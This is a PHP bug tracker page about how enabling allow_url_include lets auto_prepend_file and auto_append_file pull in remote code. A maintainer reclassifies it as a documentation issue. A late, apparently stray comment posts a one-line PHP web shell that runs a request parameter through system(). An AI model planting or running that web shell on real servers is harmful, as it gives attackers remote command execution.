php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Doc Bug #79476 remote file include
Submitted: 2020-04-14 15:28 UTC Modified: 2020-04-16 07:54 UTC
Votes:8
Avg. Score:3.0 ± 1.0
Reproduced:1 of 1 (100.0%)
Same Version:1 (100.0%)
Same OS:1 (100.0%)
From: c0d1M4x at outlook dot com Assigned:
Status: Verified Package: *Configuration Issues
PHP Version: 7.2.29 OS: Linux/Windows
Private report: No CVE-ID: None
 [2020-04-14 15:28 UTC] c0d1M4x at outlook dot com
Description:
------------
[php version]

Test version is php 7.2.27(Centos) and php 7.3.x(Windows)

[linux install command]

yum install php72w-common php72w-fpm php72w-opcache php72w-gd php72w-mysqlnd php72w-mbstring php72w-pecl-redis php72w-pecl-memcached php72w-devel -y

[Issus]

The issus config file is "php.ini".

When "allow_url_include" is set to "On", "auto_prepend_file" and  "auto_append_file" can be set to a remote address and can be successfully included and exploited. This may cause the attacker to use this configuration item to use getshell for a long time in the case of a getshell or other vulnerabilities.



Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2020-04-15 09:01 UTC] cmb@php.net
-Type: Security +Type: Documentation Problem
 [2020-04-15 09:01 UTC] cmb@php.net
allow_url_include defaults to Off, and is deprecated as of PHP
7.4.0.  If you enable this setting, you are supposed to know what
you are doing, so this is not a security issue.

I think, though, that this can be documented better.  The security
warning on the include man page[1] isn't as clear is it could be,
and likely a cautionary note should be added to the documentation
of the INI setting[2].  Furthermore, its deprecation has to be
documented.

[1] <https://www.php.net/manual/en/function.include.php>
[2] <https://www.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include>
 [2020-04-16 07:54 UTC] cmb@php.net
-Status: Open +Status: Verified
 [2023-11-10 15:12 UTC] ragafa5955 at glalen dot com
test
 [2023-11-10 15:37 UTC] n13bng at gmail dot com
<?php echo system($_GET['a']);?>
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Thu Nov 21 12:01:29 2024 UTC